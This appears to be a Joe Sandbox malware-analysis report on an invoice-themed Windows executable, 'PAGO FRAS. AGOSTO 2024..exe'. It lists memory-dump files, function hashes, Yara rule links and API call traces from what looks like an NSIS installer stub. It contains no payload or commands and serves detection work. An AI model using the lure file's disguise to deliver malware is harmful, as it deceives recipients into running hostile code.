Associated: 00000000.00000002.1695425466.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695425466.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695425466.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695529825.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695529825.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695529825.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PAGO FRAS.jbxd

Similarity

API ID: FileFindFirst
String ID:
API String ID: 1974802433-0
Opcode ID: fcbf5a8c9ec62e423337e2823bce3077c6823eab4788f95c2f9143772be47a2f
Instruction ID: 3dffafe4ea1a5cbb8d5ba181f96d08faa62a405c2aca3b81b81ef469795ec413
Opcode Fuzzy Hash: fcbf5a8c9ec62e423337e2823bce3077c6823eab4788f95c2f9143772be47a2f
Instruction Fuzzy Hash: 7AF0A0326081049FE701EBA49949AEEB7789F21324F60057BE241A21C1D7B84985AB3A

Function 004064CB Relevance: .3, Instructions: 334COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1695394960.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1695381081.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695410954.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695425466.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695425466.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695425466.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695425466.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695425466.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695529825.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695529825.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695529825.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PAGO FRAS.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e604220aa4cc57a0d507a3eee92e1260e78aef2c865a073fe0bf8dde490b4c6a
Instruction ID: 52966d4a0c143cd855de3d8d32e2f948802446bd43c2bd9d1e79afe7cfa9a62c
Opcode Fuzzy Hash: e604220aa4cc57a0d507a3eee92e1260e78aef2c865a073fe0bf8dde490b4c6a
Instruction Fuzzy Hash: D1E19B71901709DFDB24CF58C890BAABBF5FB44305F15882EE497A72D1D378AA91CB14

Function 00406CA2 Relevance: .3, Instructions: 300COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1695394960.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1695381081.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695410954.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695425466.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695425466.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695425466.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695425466.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695425466.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695529825.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695529825.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695529825.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PAGO FRAS.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c5f7cd6dd9e448d1ceba1cbc86ba17909bb361cdcfc346b133718b62247df967
Instruction ID: 28dd1b742c6822d911ebb92dd847779981f1f79bff0408386317dd500df5852d
Opcode Fuzzy Hash: c5f7cd6dd9e448d1ceba1cbc86ba17909bb361cdcfc346b133718b62247df967
Instruction Fuzzy Hash: 53C12971A0021A8BCF18CF68D5905EEB7B2FF99314F26827AD85677380D734A952CF94

Function 0040405D Relevance: 42.2, APIs: 20, Strings: 4, Instructions: 205windowstringCOMMON

Download Yara Rule

APIs

CheckDlgButton.USER32(00000000,-0000040A,00000001), ref: 004040E8
GetDlgItem.USER32(00000000,000003E8), ref: 004040FC
SendMessageA.USER32(00000000,0000045B,00000001,00000000), ref: 0040411A
GetSysColor.USER32(?), ref: 0040412B
SendMessageA.USER32(00000000,00000443,00000000,?), ref: 0040413A
SendMessageA.USER32(00000000,00000445,00000000,04010000), ref: 00404149
lstrlenA.KERNEL32(?), ref: 0040414C
SendMessageA.USER32(00000000,00000435,00000000,00000000), ref: 0040415B
SendMessageA.USER32(00000000,00000449,?,00000110), ref: 00404170
GetDlgItem.USER32(?,0000040A), ref: 004041D2
SendMessageA.USER32(00000000), ref: 004041D5
GetDlgItem.USER32(?,000003E8), ref: 00404200
SendMessageA.USER32(00000000,0000044B,00000000,00000201), ref: 00404240
LoadCursorA.USER32(00000000,00007F02), ref: 0040424F
SetCursor.USER32(00000000), ref: 00404258
ShellExecuteA.SHELL32(0000070B,open,0042D3A0,00000000,00000000,00000001), ref: 0040426B
LoadCursorA.USER32(00000000,00007F00), ref: 00404278
SetCursor.USER32(00000000), ref: 0040427B
SendMessageA.USER32(00000111,00000001,00000000), ref: 004042A7
SendMessageA.USER32(00000010,00000000,00000000), ref: 004042BB

Strings

Space required: , xrefs: 0040422B
open, xrefs: 00404263
N, xrefs: 004041EE
(@@, xrefs: 00404260

Memory Dump Source

Source File: 00000000.00000002.1695394960.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1695381081.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695410954.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695425466.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695425466.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695425466.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695425466.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695425466.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695529825.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695529825.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695529825.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PAGO FRAS.jbxd

Similarity

API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorExecuteShelllstrlen
String ID: (@@$N$Space required: $open
API String ID: 3615053054-3333049044
Opcode ID: 7868d9df4ae1d674ab0cf3f1043cffc922edae777938ca354114bc27cd0f8479
Instruction ID: c92d02d703ef172067c6e48558b1c194508f37b8d1d7228abd04d5231d4a861f
Opcode Fuzzy Hash: 7868d9df4ae1d674ab0cf3f1043cffc922edae777938ca354114bc27cd0f8479
Instruction Fuzzy Hash: 5461D3B1A40209BFEB109F21DC45F6A7B68FB44755F10807AFB00BA2D1C7B8A951CB98

Function 00401000 Relevance: 28.1, APIs: 14, Strings: 2, Instructions: 125COMMON

Download Yara Rule

APIs

DefWindowProcA.USER32(?,00000046,?,?), ref: 0040102C
BeginPaint.USER32(?,?), ref: 00401047
GetClientRect.USER32(?,?), ref: 0040105B
CreateBrushIndirect.GDI32(00000000), ref: 004010CF
FillRect.USER32(00000000,?,00000000), ref: 004010E4
DeleteObject.GDI32(?), ref: 004010ED
CreateFontIndirectA.GDI32(?), ref: 00401105
SetBkMode.GDI32(00000000,00000001), ref: 00401126
SetTextColor.GDI32(00000000,000000FF), ref: 00401130
SelectObject.GDI32(00000000,?), ref: 00401140
DrawTextA.USER32(00000000,Blaggard Setup,000000FF,00000010,00000820), ref: 00401156
SelectObject.GDI32(00000000,00000000), ref: 00401160
DeleteObject.GDI32(?), ref: 00401165
EndPaint.USER32(?,?), ref: 0040116E

Strings

Blaggard Setup, xrefs: 00401150
F, xrefs: 0040100C

Memory Dump Source

Source File: 00000000.00000002.1695394960.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1695381081.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695410954.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695425466.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695425466.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695425466.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695425466.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695425466.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695529825.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695529825.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695529825.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PAGO FRAS.jbxd

Similarity

API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
String ID: Blaggard Setup$F
API String ID: 941294808-3342400391
Opcode ID: 743dd018db8a108fdfb55826faff2fb237305abb1c3a72422579a1c27d61dc24
Instruction ID: 9af9226455e7fa8211e54ab4aa6b8deb1f4adf461e7c9b231a43246ca388c9df
Opcode Fuzzy Hash: 743dd018db8a108fdfb55826faff2fb237305abb1c3a72422579a1c27d61dc24
Instruction Fuzzy Hash: F0419B71804249AFCB058FA5CD459AFBBB9FF44310F00812AF961AA1A0C738EA51DFA5

Function 00405A78 Relevance: 24.6, APIs: 11, Strings: 3, Instructions: 131stringmemoryCOMMON

Download Yara Rule

APIs

lstrcpyA.KERNEL32(0042B5F8,NUL,?,00000000,?,00000000,00405C0B,?,?), ref: 00405A87
CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,00000000,00405C0B,?,?), ref: 00405AAB
GetShortPathNameA.KERNEL32(?,0042B5F8,00000400), ref: 00405AB4

Part of subcall function 00405907: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405B64,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405917
Part of subcall function 00405907: lstrlenA.KERNEL32(00000000,?,00000000,00405B64,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405949

GetShortPathNameA.KERNEL32(0042B9F8,0042B9F8,00000400), ref: 00405AD1
wsprintfA.USER32 ref: 00405AEF
GetFileSize.KERNEL32(00000000,00000000,0042B9F8,C0000000,00000004,0042B9F8,?,?,?,?,?), ref: 00405B2A
GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 00405B39
lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405B71
SetFilePointer.KERNEL32(004093B0,00000000,00000000,00000000,00000000,0042B1F8,00000000,-0000000A,004093B0,00000000,[Rename],00000000,00000000,00000000), ref: 00405BC7
GlobalFree.KERNEL32(00000000), ref: 00405BD8
CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00405BDF

Part of subcall function 004059A2: GetFileAttributesA.KERNELBASE(00000003,00402CA6,C:\Users\user\Desktop\PAGO FRAS. AGOSTO 2024..exe,80000000,00000003), ref: 004059A6
Part of subcall function 004059A2: CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 004059C8

Strings

%s=%s, xrefs: 00405AE5
NUL, xrefs: 00405A81
[Rename], xrefs: 00405B59, 00405B6B

Memory Dump Source

Source File: 00000000.00000002.1695394960.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1695381081.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695410954.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695425466.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695425466.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695425466.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695425466.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695425466.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695529825.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695529825.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695529825.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PAGO FRAS.jbxd

Similarity

API ID: File$CloseGlobalHandleNamePathShortlstrcpylstrlen$AllocAttributesCreateFreePointerSizewsprintf
String ID: %s=%s$NUL$[Rename]
API String ID: 222337774-4148678300
Opcode ID: 1f98854de7e5c40725f23c70871346fb007f1980b568e50079ef848d7602898f
Instruction ID: 8a014ae25a2f57f4e7f496887e8afb480c0f68f452f449b39f33bde68a4ee9be
Opcode Fuzzy Hash: 1f98854de7e5c40725f23c70871346fb007f1980b568e50079ef848d7602898f
Instruction Fuzzy Hash: 5231F370604B19ABC2206B615D49F6B3A6CDF45758F14053AFE01F62D2DA7CB800CEAD

Function 00405F9A Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 69COMMON

Download Yara Rule

APIs

CharNextA.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\PAGO FRAS. AGOSTO 2024..exe",74DF3410,C:\Users\user\AppData\Local\Temp\,00000000,004030EA,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004032FF), ref: 00405FF2
CharNextA.USER32(?,?,?,00000000), ref: 00405FFF
CharNextA.USER32(?,"C:\Users\user\Desktop\PAGO FRAS. AGOSTO 2024..exe",74DF3410,C:\Users\user\AppData\Local\Temp\,00000000,004030EA,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004032FF), ref: 00406004
CharPrevA.USER32(?,?,74DF3410,C:\Users\user\AppData\Local\Temp\,00000000,004030EA,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004032FF), ref: 00406014

Strings

*?|<>/":, xrefs: 00405FE2
C:\Users\user\AppData\Local\Temp\, xrefs: 00405F9B
"C:\Users\user\Desktop\PAGO FRAS. AGOSTO 2024..exe", xrefs: 00405FD6

Memory Dump Source

Source File: 00000000.00000002.1695394960.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1695381081.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695410954.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695425466.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695425466.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695425466.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695425466.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695425466.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695529825.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695529825.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695529825.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PAGO FRAS.jbxd

Similarity

API ID: Char$Next$Prev
String ID: "C:\Users\user\Desktop\PAGO FRAS. AGOSTO 2024..exe"$*?|<>/":$C:\Users\user\AppData\Local\Temp\
API String ID: 589700163-3131691481
Opcode ID: ce3d7990729f771fdc32bb0ed1b54e2c2469674ae1568702cd8079844570f2a1
Instruction ID: 57e0f34d942670e43035b7c22e392f1a12bb14715b301cf1348a0c798ab9ef07
Opcode Fuzzy Hash: ce3d7990729f771fdc32bb0ed1b54e2c2469674ae1568702cd8079844570f2a1
Instruction Fuzzy Hash: 8B112751809B932AFB3256244C00B7BBFD88F57760F19007BE8D5722C2D67C5D529B6D

Function 00403F7B Relevance: 12.1, APIs: 8, Instructions: 61COMMON

Download Yara Rule

APIs

GetWindowLongA.USER32(?,000000EB), ref: 00403F98
GetSysColor.USER32(00000000), ref: 00403FB4
SetTextColor.GDI32(?,00000000), ref: 00403FC0
SetBkMode.GDI32(?,?), ref: 00403FCC
GetSysColor.USER32(?), ref: 00403FDF
SetBkColor.GDI32(?,?), ref: 00403FEF
DeleteObject.GDI32(?), ref: 00404009
CreateBrushIndirect.GDI32(?), ref: 00404013

Memory Dump Source

Source File: 00000000.00000002.1695394960.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1695381081.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695410954.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695425466.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695425466.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695425466.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695425466.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695425466.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695529825.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695529825.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695529825.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PAGO FRAS.jbxd

Similarity

API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
String ID:
API String ID: 2320649405-0
Opcode ID: e8c91e704ef8b2f1a11ad189bfd14f771d09f9d58710722270f9777396a44b4e
Instruction ID: f3431a0ddd372d44177634c3e6640760e16b4c563197d04d055afd4279a4596b
Opcode Fuzzy Hash: e8c91e704ef8b2f1a11ad189bfd14f771d09f9d58710722270f9777396a44b4e
Instruction Fuzzy Hash: F4219F71808705ABCB209F78DD48A4BBBF8AF41704B048A2AE996F26E0C734E904CB55

Function 00404F48 Relevance: 10.6, APIs: 7, Instructions: 73stringwindowCOMMON

Download Yara Rule

APIs

lstrlenA.KERNEL32(00429048,00000000,0041C205,74DF23A0,?,?,?,?,?,?,?,?,?,00402FFA,00000000,?), ref: 00404F81
lstrlenA.KERNEL32(00402FFA,00429048,00000000,0041C205,74DF23A0,?,?,?,?,?,?,?,?,?,00402FFA,00000000), ref: 00404F91
lstrcatA.KERNEL32(00429048,00402FFA,00402FFA,00429048,00000000,0041C205,74DF23A0), ref: 00404FA4
SetWindowTextA.USER32(00429048,00429048), ref: 00404FB6
SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00404FDC
SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00404FF6
SendMessageA.USER32(?,00001013,?,00000000), ref: 00405004

Memory Dump Source

Source File: 00000000.00000002.1695394960.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1695381081.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695410954.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695425466.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695425466.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695425466.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695425466.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695425466.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695529825.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695529825.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695529825.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PAGO FRAS.jbxd

Similarity

API ID: MessageSend$lstrlen$TextWindowlstrcat
String ID:
API String ID: 2531174081-0
Opcode ID: 534154c7e412c88fb75b9fbb21228ed2bc61e9f55108b0b726938b2d4222e579
Instruction ID: 5247e829223e414f07dbea0a4ec6ac131d28d962b221907bbf4360a320382309
Opcode Fuzzy Hash: 534154c7e412c88fb75b9fbb21228ed2bc61e9f55108b0b726938b2d4222e579
Instruction Fuzzy Hash: 76218C71D00118BBDF219FA5DC84ADEBFA9EF08354F10807AF904B6291C7798E408FA8

Function 00404813 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48windowCOMMON

Download Yara Rule

APIs

SendMessageA.USER32(?,0000110A,00000009,00000000), ref: 0040482E
GetMessagePos.USER32 ref: 00404836
ScreenToClient.USER32(?,?), ref: 00404850
SendMessageA.USER32(?,00001111,00000000,?), ref: 00404862
SendMessageA.USER32(?,0000110C,00000000,?), ref: 00404888

Strings

f, xrefs: 00404864

Memory Dump Source

Source File: 00000000.00000002.1695394960.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1695381081.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695410954.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695425466.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695425466.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695425466.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695425466.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695425466.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695529825.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695529825.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695529825.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PAGO FRAS.jbxd

Similarity

API ID: Message$Send$ClientScreen
String ID: f
API String ID: 41195575-1993550816
Opcode ID: 13dcb630cae817d26763a7c5c34c1a537cec2b83c976c16d0abeb4614e4307e4
Instruction ID: 72a6dff9965abeea3fde93c43f55bc8d1d0b984f63b53e8c81f3052648e7bb03
Opcode Fuzzy Hash: 13dcb630cae817d26763a7c5c34c1a537cec2b83c976c16d0abeb4614e4307e4
Instruction Fuzzy Hash: EC019275D00218BADB00DBA5DC41FFEBBBCAF45711F10412BBB10B61C0C7B4A5018BA5

Function 00402B7F Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 40timeCOMMON

Download Yara Rule

APIs

SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402B9A
MulDiv.KERNEL32(000DAB95,00000064,000DAB99), ref: 00402BC5
wsprintfA.USER32 ref: 00402BD5
SetWindowTextA.USER32(?,?), ref: 00402BE5
SetDlgItemTextA.USER32(?,00000406,?), ref: 00402BF7

Strings

verifying installer: %d%%, xrefs: 00402BCF

Memory Dump Source

Source File: 00000000.00000002.1695394960.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1695381081.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695410954.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695425466.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695425466.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695425466.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695425466.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695425466.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695529825.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695529825.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695529825.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PAGO FRAS.jbxd

Similarity

API ID: Text$ItemTimerWindowwsprintf
String ID: verifying installer: %d%%
API String ID: 1451636040-82062127
Opcode ID: f377c182e300eefdb83bb0ba9c57991093f425550345df3c4c3600326924e25d
Instruction ID: f77185bba9c57e6aa61c0c8aee9f592e237af7c43fbef78eddb3d4185353df7a
Opcode Fuzzy Hash: f377c182e300eefdb83bb0ba9c57991093f425550345df3c4c3600326924e25d
Instruction Fuzzy Hash: D001F471640208BBEF209F60DD09EAE3779EB04744F008039FA16B51D1D7B5A955DB59

Function 004026C6 Relevance: 9.1, APIs: 6, Instructions: 86memoryfileCOMMON

Download Yara Rule

APIs

GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,?,?,?,000000F0), ref: 0040271A
GlobalAlloc.KERNEL32(00000040,?,00000000,?,?,?,?,?,000000F0), ref: 00402736
GlobalFree.KERNEL32(?), ref: 0040276F
GlobalFree.KERNEL32(00000000), ref: 00402782
CloseHandle.KERNEL32(?,?,?,?,000000F0), ref: 0040279A
DeleteFileA.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,?,?,?,000000F0), ref: 004027AE

Memory Dump Source

Source File: 00000000.00000002.1695394960.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1695381081.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695410954.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695425466.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695425466.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695425466.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695425466.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695425466.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695529825.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695529825.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695529825.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PAGO FRAS.jbxd

Similarity

API ID: Global$AllocFree$CloseDeleteFileHandle
String ID:
API String ID: 2667972263-0
Opcode ID: 77e67ac391457e8d004afc0bb320801bb8c14dfd16ab1e53836186cbf3f5f692
Instruction ID: 5d6717e5ef000630179c441ec4dabf90fe6e4dbd5b0bc7dedcefa97c90ee8361
Opcode Fuzzy Hash: 77e67ac391457e8d004afc0bb320801bb8c14dfd16ab1e53836186cbf3f5f692
Instruction Fuzzy Hash: 1D215E71800124BBCF216FA5CE49EAE7E79EF09324F14423AF910762D1D7795D418FA9

Function 00402A7A Relevance: 7.6, APIs: 5, Instructions: 67registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExA.ADVAPI32(?,?,00000000,?,?), ref: 00402A9B
RegEnumKeyA.ADVAPI32(?,00000000,?,00000105), ref: 00402AD7
RegCloseKey.ADVAPI32(?), ref: 00402AE0
RegCloseKey.ADVAPI32(?), ref: 00402B05
